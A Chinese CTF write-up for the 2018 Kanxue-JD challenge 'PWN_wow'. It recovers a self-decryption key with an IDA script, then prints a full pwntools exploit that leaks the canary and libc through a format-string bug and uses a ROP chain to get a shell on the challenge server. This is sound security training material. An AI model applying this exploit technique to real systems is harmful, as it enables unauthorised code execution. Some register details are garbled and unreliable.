[原创]看雪.京东 2018CTF 第三题 PWN_wow WriteUp-CTF对抗-看雪-安全社区|安全招聘|kanxue.com

[原创]看雪.京东 2018CTF 第三题 PWN_wow WriteUp

2018-6-21 12:01 2413

[原创]看雪.京东 2018CTF 第三题 PWN_wow WriteUp

lacoucou

2018-6-21 12:01

2413

1.先检查下开了什么验证

【1】RELRO：RELRO会有Partial RELRO和FULL RELRO，如果开启FULL RELRO，意味着我们无法修改got表

【2】Stack：如果栈中开启Canary found，那么就不能用直接用溢出的方法覆盖栈中返回地址，而且要通过改写指针与局部变量、leak canary

、overwrite canary的方法来绕过

【3】NX：NX enabled如果这个保护开启就是意味着栈中数据没有执行权限，以前的经常用的call esp或者jmp esp的方法就不能使用，但是可

以利用rop这种方法绕过

【4】PIE：PIE enabled如果程序开启这个地址随机化选项就意味着程序每次运行的时候地址都会变化，而如果没有开PIE的话那么No PIE

(0x400000)，括号内的数据就是程序的基地址

【5】FORTIFY：FORTIFY_SOURCE机制对格式化字符串有两个限制(1)包含%n的格式化字符串不能位于程序内存中的可写地址。(2)当使用位置参

数时，必须使用范围内的所有参数。所以如果要使用%7$x，你必须同时使用1,2,3,4,5和6。

网上搜的解释，凑合着看吧。

开了NX，栈上数据就没法执行了。

2.程序分析

int __cdecl main(int argc, const char **argv, const char **envp)
{
  setbuf(stdin, 0LL);
  setbuf(stdout, 0LL);
  welcome();
  JUMPOUT(__CS__, 4196376LL);
}

__int64 welcome()
{
  puts("***************************\n");
  puts("2018 kanxue CTF\n");
  puts("***************************\n");
  puts("***************************\n");
  puts("常记溪亭日暮，沉醉不知归路。\n");
  puts("兴尽晚回舟，误入藕花深处。\n");
  puts("争渡，争渡，惊起一滩鸥鹭。\n");
  puts(asc_400C01);
  puts("***************************\n");
  return test();
}

.text:0000000000400751                 public test
.text:0000000000400751 test            proc near               ; CODE XREF: welcome+63↑p
.text:0000000000400751 ; __unwind {
.text:0000000000400751                 push    rbp
.text:0000000000400752                 mov     rbp, rsp
.text:0000000000400755                 mov     rax, 65h
.text:000000000040075C                 mov     rcx, 0
.text:0000000000400763                 mov     rdx, 1          ; addr
.text:000000000040076A                 mov     rsi, 0          ; pid
.text:0000000000400771                 mov     rdi, 0          ; request
.text:0000000000400778                 syscall                 ; LINUX - sys_ptrace
.text:000000000040077A                 cmp     rax, 0
.text:000000000040077E                 jmp     short L_K1    //这里不跳就退出了，算是个反调试，改为jmp 只有一直执行这个程序
.text:0000000000400780 ; ---------------------------------------------------------------------------
.text:0000000000400780                 mov     rax, 3Ch
.text:0000000000400787                 mov     rdi, 0          ; error_code
.text:000000000040078E                 syscall                 ; LINUX - sys_exit
.text:0000000000400790
.text:0000000000400790 L_K1:                                   ; CODE XREF: test+2D↑j
.text:0000000000400790                 nop
.text:0000000000400791                 nop
.text:0000000000400792                 pop     rbp
.text:0000000000400793                 retn
.text:0000000000400793 ; } // starts at 400751
.text:0000000000400793 test            endp
.text:0000000000400793

接下来就进入关键代码了：

.text:0000000000400818                 sar     rax, 0Ch
.text:000000000040081C                 shl     rax, 0Ch
.text:0000000000400820                 mov     rdi, rax
.text:0000000000400823
.text:0000000000400823 loc_400823:                             ; CODE XREF: .text:000000000040088E↓j
.text:0000000000400823                 mov     rdx, 7
.text:000000000040082A                 mov     rax, 0Ah
.text:0000000000400831                 mov     rsi, 1000h
.text:0000000000400838                 syscall                 ; LINUX - sys_mprotect
.text:000000000040083A                 xor     rax, rax
.text:000000000040083D                 mov     rdx, 6
.text:0000000000400844                 push    rax
.text:0000000000400845                 lea     rax, ds:601080h
.text:000000000040084D                 mov     rsi, rax
.text:0000000000400850                 pop     rax
.text:0000000000400851                 mov     rdi, rax
.text:0000000000400854                 syscall                 ; LINUX -read 函数，读取6个字符到601080
.text:0000000000400856                 call    $+5
.text:000000000040085B                 pop     rax
.text:000000000040085C                 add     rax, 24h
.text:0000000000400860                 xor     rcx, rcx
.text:0000000000400863                 mov     dl, [rsi+rcx]
.text:0000000000400866
.text:0000000000400866 L1_64:                                  ; CODE XREF: .text:0000000000400878↓j
.text:0000000000400866                                         ; .text:000000000040087D↓j
.text:0000000000400866                 mov     bl, [rax+rcx]
.text:0000000000400869                 xor     bl, dl
.text:000000000040086B                 mov     [rax+rcx], bl
.text:000000000040086E
.text:000000000040086E loc_40086E:
.text:000000000040086E                 mov     dh, [rax+rcx-1]
.text:0000000000400872
.text:0000000000400872 loc_400872:
.text:0000000000400872                 inc     rcx
.text:0000000000400875                 cmp     dh, 0FBh
.text:0000000000400878                 jz      short L1_64
.text:000000000040087A                 cmp     bl, 90h
.text:000000000040087D                 jnz     short L1_64

之后的主要是代码自解压。

根据用户输入的字符(总共6个)进行6段代码的解压。

解压后代码：

text:000000000040087F 48 8D 04 08              lea     rax, [rax+rcx]           ecx=4a
.text:0000000000400883 48 2D 80 00 00 00       sub     rax, 80h                rax=400849
.text:0000000000400889 48 31 C9                xor     rcx, rcx
.text:000000000040088C
.text:000000000040088C                         loc_40088C:                             ; CODE XREF: .text:000000000040089B↓j
.text:000000000040088C 8A 1C 08                mov     bl, [rax+rcx]
.text:000000000040088F 30 D3                   xor     bl, dl
.text:0000000000400891 88 1C 08                mov     [rax+rcx], bl
.text:0000000000400894 48 FF C1                inc     rcx
.text:0000000000400897 48 83 F9 20             cmp     rcx, 20h
.text:000000000040089B 7C EF                   jl      short loc_40088C
.text:000000000040089D 48 05 80 00 00 00       add     rax, 80h           rax 4008c9
.text:00000000004008A3 48 31 C9                xor     rcx, rcx
.text:00000000004008A6 8A 14 0E                mov     dl, [rsi+rcx]
.text:00000000004008A9 48 FF C6                inc     rsi
.text:00000000004008AC 32 14 0E                xor     dl, [rsi+rcx]         输入的第一个字符与第二个异或
.text:00000000004008AF
.text:00000000004008AF                         L2_64:                                  ; CODE XREF: .text:00000000004008C1↓j
.text:00000000004008AF                                                                 ; .text:00000000004008C6↓j
.text:00000000004008AF 8A 1C 08                mov     bl, [rax+rcx]               rax=4008c9
.text:00000000004008B2 30 D3                   xor     bl, dl
.text:00000000004008B4 88 1C 08                mov     [rax+rcx], bl
.text:00000000004008B7 8A 74 08 FF             mov     dh, [rax+rcx-1]
.text:00000000004008BB 48 FF C1                inc     rcx
.text:00000000004008BE 80 FE FB                cmp     dh, 0FBh
.text:00000000004008C1 74 EC                   jz      short L2_64
.text:00000000004008C3 80 FB 90                cmp     bl, 90h
.text:00000000004008C6 75 E7                   jnz     short L2_64
.text:00000000004008C8 90                      nop
.text:00000000004008C9 48 8D 04 08             lea     rax, [rax+rcx]
.text:00000000004008CD 48 2D 80 00 00 00       sub     rax, 80h
.text:00000000004008D3 48 31 C9                xor     rcx, rcx
.text:00000000004008D6
.text:00000000004008D6                         LEn1_64:                                ; CODE XREF: .text:00000000004008E5↓j
.text:00000000004008D6 8A 1C 08                mov     bl, [rax+rcx]
.text:00000000004008D9 30 D3                   xor     bl, dl
.text:00000000004008DB 88 1C 08                mov     [rax+rcx], bl
.text:00000000004008DE 48 FF C1                inc     rcx
.text:00000000004008E1 48 83 F9 20             cmp     rcx, 20h
.text:00000000004008E5 7C EF                   jl      short LEn1_64
.text:00000000004008E7 48 05 80 00 00 00       add     rax, 80h
.text:00000000004008ED 48 31 C9                xor     rcx, rcx
.text:00000000004008F0 48 FF C6                inc     rsi
.text:00000000004008F3 32 14 0E                xor     dl, [rsi+rcx]           第三个字符与(第一个与第二个字符的xor结果0x13异或)
.text:00000000004008F6
.text:00000000004008F6                         L3_64:                                  ; CODE XREF: .text:0000000000400908↓j
.text:00000000004008F6                                                                 ; .text:000000000040090D↓j
.text:00000000004008F6 8A 1C 08                mov     bl, [rax+rcx]
.text:00000000004008F9 30 D3                   xor     bl, dl
.text:00000000004008FB 88 1C 08                mov     [rax+rcx], bl
.text:00000000004008FE 8A 74 08 FF             mov     dh, [rax+rcx-1]
.text:0000000000400902 48 FF C1                inc     rcx
.text:0000000000400905 80 FE FB                cmp     dh, 0FBh
.text:0000000000400908 74 EC                   jz      short L3_64
.text:000000000040090A 80 FB 90                cmp     bl, 90h
.text:000000000040090D 75 E7                   jnz     short L3_64
.text:000000000040090F 90                      nop
.text:0000000000400910 48 8D 04 08             lea     rax, [rax+rcx]
.text:0000000000400914 48 2D 80 00 00 00       sub     rax, 80h
.text:000000000040091A 48 31 C9                xor     rcx, rcx
.text:000000000040091D
.text:000000000040091D                         LEn2_64:                                ; CODE XREF: .text:000000000040092C↓j
.text:000000000040091D 8A 1C 08                mov     bl, [rax+rcx]
.text:0000000000400920 30 D3                   xor     bl, dl
.text:0000000000400922 88 1C 08                mov     [rax+rcx], bl
.text:0000000000400925 48 FF C1                inc     rcx
.text:0000000000400928 48 83 F9 20             cmp     rcx, 20h
.text:000000000040092C 7C EF                   jl      short LEn2_64
.text:000000000040092E 48 05 80 00 00 00       add     rax, 80h
.text:0000000000400934 48 31 C9                xor     rcx, rcx
.text:0000000000400937 48 FF C6                inc     rsi
.text:000000000040093A 32 14 0E                xor     dl, [rsi+rcx]
.text:000000000040093D
.text:000000000040093D                         L4_64:                                  ; CODE XREF: .text:000000000040094F↓j
.text:000000000040093D 8A 1C 08                mov     bl, [rax+rcx]
.text:0000000000400940 30 D3                   xor     bl, dl
.text:0000000000400942 88 1C 08                mov     [rax+rcx], bl
.text:0000000000400945 8A 74 08 FF             mov     dh, [rax+rcx-1]
.text:0000000000400949 48 FF C1                inc     rcx
.text:000000000040094C 80 FE FB                cmp     dh, 0FBh
.text:000000000040094F 74 EC                   jz      short L4_64
.text:0000000000400951 80 FB 90                cmp     bl, 90h
.text:0000000000400954 75 E7                   jnz     short L4_64
.text:0000000000400956 90                      nop


.text:00000000004009DC 48 8D 04 08             lea     rax, [rax+rcx]
.text:00000000004009E0 48 2D C0 00 00 00       sub     rax, 0C0h
.text:00000000004009E6 48 31 C9                xor     rcx, rcx
.text:00000000004009E9
.text:00000000004009E9                         LEn5_64:                                ; CODE XREF: .text:00000000004009F8↓j
.text:00000000004009E9 8A 1C 08                mov     bl, [rax+rcx]
.text:00000000004009EC 30 D3                   xor     bl, dl
.text:00000000004009EE 88 1C 08                mov     [rax+rcx], bl
.text:00000000004009F1 48 FF C1                inc     rcx
.text:00000000004009F4 48 83 F9 20             cmp     rcx, 20h
.text:00000000004009F8 7C EF                   jl      short LEn5_64
.text:00000000004009FA 48 C7 C0 01 00 00 00    mov     rax, 1
.text:0000000000400A01 48 C7 C2 05 00 00 00    mov     rdx, 5
.text:0000000000400A08 48 8D 34 25 58 10 60 00 lea     rsi, szCh2                      ; "wow!\n"
.text:0000000000400A10 48 89 C7                mov     rdi, rax
.text:0000000000400A13 0F 05                   syscall                                 ; LINUX - sys_write
.text:0000000000400A15 BF 00 00 00 00          mov     edi, 0
.text:0000000000400A1A E8 B1 FB FF FF          call    _fflush
.text:0000000000400A1F 48 39 C0                cmp     rax, rax
.text:0000000000400A22
.text:0000000000400A22                         L_J0:
.text:0000000000400A22 75 12                   jnz     short near ptr loc_400A33+3
.text:0000000000400A24 E8 00 00 00 00          call    $+5
.text:0000000000400A29
.text:0000000000400A29                         L_J1:
.text:0000000000400A29 58                      pop     rax
.text:0000000000400A2A 48 83 C0 07             add     rax, 7
.text:0000000000400A2E FF E0                   jmp     rax
.text:0000000000400A30                         ; ---------------------------------------------------------------------------
.text:0000000000400A30 48 31 C0                xor     rax, rax
.text:0000000000400A33
.text:0000000000400A33                         loc_400A33:                             ; CODE XREF: .text:L_J0↑j
.text:0000000000400A33 48 C7 C2 1A 00 00 00    mov     rdx, 1Ah
.text:0000000000400A3A 48 89 E6                mov     rsi, rsp
.text:0000000000400A3D 48 89 24 25 88 10 60 00 mov     ds:lpGoble, rsp
.text:0000000000400A45 48 89 C7                mov     rdi, rax
.text:0000000000400A48 0F 05                   syscall                                 ; LINUX - sys_read
.text:0000000000400A4A 48 8B 05 37 06 20 00    mov     rax, cs:lpGoble
.text:0000000000400A51 48 89 C7                mov     rdi, rax
.text:0000000000400A54 B8 00 00 00 00          mov     eax, 0
.text:0000000000400A59 E8 52 FB FF FF          call    _printf
.text:0000000000400A5E 48 31 C0                xor     rax, rax
.text:0000000000400A61 48 C7 C2 00 02 00 00    mov     rdx, 200h
.text:0000000000400A68 48 8D 74 24 E0          lea     rsi, [rsp-20h]
.text:0000000000400A6D 48 89 C7                mov     rdi, rax
.text:0000000000400A70 0F 05                   syscall                                 ; LINUX - sys_read
.text:0000000000400A72 90                      nop
.text:0000000000400A73 E8 00 00 00 00          call    $+5
.text:0000000000400A78
.text:0000000000400A78                         L_en:
.text:0000000000400A78 58                      pop     rax
.text:0000000000400A79 48 83 C0 07             add     rax, 7
.text:0000000000400A7D FF E0                   jmp     rax
.text:0000000000400A7F                         ; ---------------------------------------------------------------------------
.text:0000000000400A7F 48 C1 F8 0C             sar     rax, 0Ch
.text:0000000000400A83 48 C1 E0 0C             shl     rax, 0Ch
.text:0000000000400A87 48 89 C7                mov     rdi, rax
.text:0000000000400A8A 48 C7 C2 05 00 00 00    mov     rdx, 5
.text:0000000000400A91 48 C7 C0 0A 00 00 00    mov     rax, 0Ah
.text:0000000000400A98 48 C7 C6 00 10 00 00    mov     rsi, 1000h
.text:0000000000400A9F 0F 05                   syscall                                 ; LINUX - sys_mprotect
.text:0000000000400AA1 B8 00 00 00 00          mov     eax, 0
.text:0000000000400AA6 48 8B 55 F8             mov     rdx, [rbp-8]
.text:0000000000400AAA 64 48 33 14 25 28 00 00+xor     rdx, fs:28h
.text:0000000000400AB3 74 05                   jz      short locret_400ABA
.text:0000000000400AB5 E8 D6 FA FF FF          call    ___stack_chk_fail
.text:0000000000400ABA                         ; ---------------------------------------------------------------------------
.text:0000000000400ABA
.text:0000000000400ABA                         locret_400ABA:                          ; CODE XREF: .text:0000000000400AB3↑j
.text:0000000000400ABA C9                      leave
.text:0000000000400ABB C3                      retn
.text:0000000000400ABB                         ; } // starts at 400794

根据其判断条件：

.text:0000000000400875                 cmp     dh, 0FBh    前一个字符
.text:0000000000400878                 jz      short L1_64
.text:000000000040087A                 cmp     bl, 90h       当前字符

前一个字符异或之后是0xfb 当前字符异或之后是0x90 异或的key是一样的。

根据这个条件，可以得到前五个字符。

最后一个比较

.text:00000000004008C3 80 FB 90                cmp     bl, 90h

只检测了当前字符还原后是0x90,要解压的内容：

00000000004009DC  47 82 0B 07 47 22 CF 0F  0F 0F 47 3E C6 85 13 07  G...G"....G>....
00000000004009EC  3F DC 87 13 07 47 F0 CE  47 8C F6 2F 73 E0 47 C8  ?....G..G../s.G.
00000000004009FC  CF 0E 0F 0F 0F 47 C8 CD  0A 0F 0F 0F 47 82 3B 2A  .....G......G.;*
0000000000400A0C  57 1F 6F 0F 47 86 C8 00  0A B0 0F 0F 0F 0F E7 BE  W.o.G...........
0000000000400A1C  F4 F0 F0 47 36 CF 7A 1D  E7 0F 0F 0F 0F 57 47 8C  ...G6.z......WG.
0000000000400A2C  CF 08 F0 EF 47 3E CF 47  C8 CD 15 0F 0F 0F 47 86  ....G>.G......G.

里边有大量的0f,因此猜测异或的key是0xf

写脚本还原出代码自解压的key:

import idc
#ida 6.8
def test_char(beginEa):
    retInt=0
    for i in range(0,100):
        curEa=beginEa+i
        prevByte=idc.Byte(curEa-1)
        curByte=idc.Byte(curEa)
        xorPrev=(prevByte^0xfb)
        xorcur=(curByte^0x90)
        if  xorPrev==xorcur:
            print hex(curEa),hex(xorPrev),chr(xorPrev)
            retInt=xorPrev
            break
    return retInt


str_in=""
x0=test_char(0x40087f)
print x0
str_in+=chr(x0)
x1=test_char(0x4008c9)
str_in+=chr(x1^x0)
x2=test_char(0x400910)
str_in+=chr(x2^x1)
x3=test_char(0x400957)
str_in+=chr(x3^x2)
x4=test_char(0x40099e)
str_in+=chr(x4^x3)
str_in+=chr(0xf^x4)
print str_in

运行之后得到：

0x4008c5 0x65 e

0x40090c 0x13

0x400953 0x4b K

0x40099a 0x25 %

0x4009d8 0x44 D

evXnaK

key为evXnaK

3.漏洞

.text:0000000000400A33 48 C7 C2 1A 00 00 00    mov     rdx, 1Ah
.text:0000000000400A3A 48 89 E6                mov     rsi, rsp
.text:0000000000400A3D 48 89 24 25 88 10 60 00 mov     ds:lpGoble, rsp
.text:0000000000400A45 48 89 C7                mov     rdi, rax
.text:0000000000400A48 0F 05                   syscall                                 ; LINUX - sys_read
.text:0000000000400A4A 48 8B 05 37 06 20 00    mov     rax, cs:lpGoble
.text:0000000000400A51 48 89 C7                mov     rdi, rax
.text:0000000000400A54 B8 00 00 00 00          mov     eax, 0
.text:0000000000400A59 E8 52 FB FF FF          call    _printf
.text:0000000000400A5E 48 31 C0                xor     rax, rax
.text:0000000000400A61 48 C7 C2 00 02 00 00    mov     rdx, 200h
.text:0000000000400A68 48 8D 74 24 E0          lea     rsi, [rsp-20h]
.text:0000000000400A6D 48 89 C7                mov     rdi, rax
.text:0000000000400A70 0F 05                   syscall                                 ; LINUX - sys_read

接下来会读取一个字符串，然后printf输入，然后再向栈中读取0x200字节的数据。

这里printf可触发格式化字符串漏洞。

当前栈中有用就这几个。

获取到seed值之后，就可以覆盖返回地址。

获取start函数地址之后，可根据此函数地址计算出system地址。

根据system地址，计算出libc中“/bin/sh”地址。

因为栈中不能执行数据，只能利用rop进行攻击。

ROPgadget --binary "wow" --only "pop|ret"
Gadgets information
============================================================
0x0000000000400b1c : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400b1e : pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400b20 : pop r14 ; pop r15 ; ret
0x0000000000400b22 : pop r15 ; ret
0x0000000000400b1b : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400b1f : pop rbp ; pop r14 ; pop r15 ; ret
0x0000000000400650 : pop rbp ; ret
0x0000000000400b23 : pop rdi ; ret
0x0000000000400b21 : pop rsi ; pop r15 ; ret
0x0000000000400b1d : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400561 : ret
0x000000000040099c : ret 0xcb5
0x0000000000400765 : ret 1
0x0000000000400a8c : ret 5
0x000000000040083f : ret 6

找到了pop rsi,ret 直接吧rsi中传如 /bin/sh地址，ret到system地址即可。

poc:

#!/usr/bin/env python

# -*- coding: utf-8 -*-



from pwn import *

from time import sleep

import sys



context.log_level = "debug"

g_local=True



sh=0

if g_local:

    sh=process("./wow")

    raw_input("ida has attch? Press any key for continue...")

else:

    sh=remote("139.199.99.130",65188)

   



local_system=0x45390

local_libc_start_main=0x20740
local_sh_str=0x18c177

net_system=0x45390

net_libc_start_main=0x20740

def parse_text(intext):

    index1=intext.find("@")

    index2=intext.find("@",index1+1)

    index3=intext.find("@",index2+1)

    index4=intext.find("@",index3+1)

    stack_str=intext[index1+1:index2]

    seed_str=intext[index2+1:index3]

    libc_start_main_str=intext[index3+1:index4]

    print stack_str[2:]

    print seed_str[2:]

    print hex(int(stack_str[2:],16))

    print hex(int(seed_str[2:],16))

    return int(seed_str[2:],16),int(stack_str[2:],16),int(libc_start_main_str[2:],16)



#rdi rsi rdx rcx r8 r9 

def test():

    print "hello"
    if g_local:

        print sh.recv(0x200)
    else:
        print sh.recv(0x200)
        print sh.recv(0x200)

    raw_input()
    #%p get stack address
    #%13$p get cookie seed
    #%15$p get libc_start_main address

    sh.send("evXnaK@%p@%13$p@%15$p@")
    if g_local:

        retBuf=sh.recv(100)

        print retBuf
    else:
        print sh.recv(100)
        retBuf=sh.recv(0x100)
        print retBuf

    seed,stack_address,libc=parse_text(retBuf)

    system_address=0
    sh_address=0

    if g_local:

        system_address=(libc-0xF0)-local_libc_start_main+local_system
        #sh_address=(libc-0xF0)-local_libc_start_main+local_sh_str
        sh_address=system_address+(0x7fe8559f7d57-0x7fe8558b0390)

    else:

        system_address=(libc-0xF0)-net_libc_start_main+net_system
        #sh_address=(libc-0xF0)-net_libc_start_main+local_sh_str
        sh_address=system_address+(0x7fe8559f7d57-0x7fe8558b0390)

    print "seed:",hex(seed),"stack_address:",hex(stack_address)

    print "system:",hex(system_address)
    print "/bin/sh address:",hex(sh_address)

    payload=""

    payload+="/bin/sh\x00"            #no use
    payload+=p64(system_address)

    payload+='\x00'*(5*16+8-len(payload))

    payload+=p64(seed)                #cookie seed

    payload+=p64(0x400ac0)

    payload+=p64(0x400b23)        #main function return address 
    payload+=p64(sh_address)      #pop rsi
    payload+=p64(system_address)  #ret
    print payload

    sh.send(payload)
    raw_input()

    sh.interactive()   

    

test()

比较幸运的是，本地system 和/bin/sh字符串的地址与服务器一致，省去了查找偏移的时间。

POC整体流程。

1.发送代码自解压的key evXnaK 使程序正常运行。

2.利用printf 格式化字符串漏洞获取cookie seed 和libc中start函数的值。之后通过start函数计算system函数，和字符串地址。

3.构造payload. '\x00'*(5*16+8)+p64(seed)+p64(0)+p64(ret_rop_address)+p64(rsi_address)+p64(system_address)

4.利用最后一个read 把paload读入栈中，覆盖返回地址到rop地址(400b23) ,执行rop。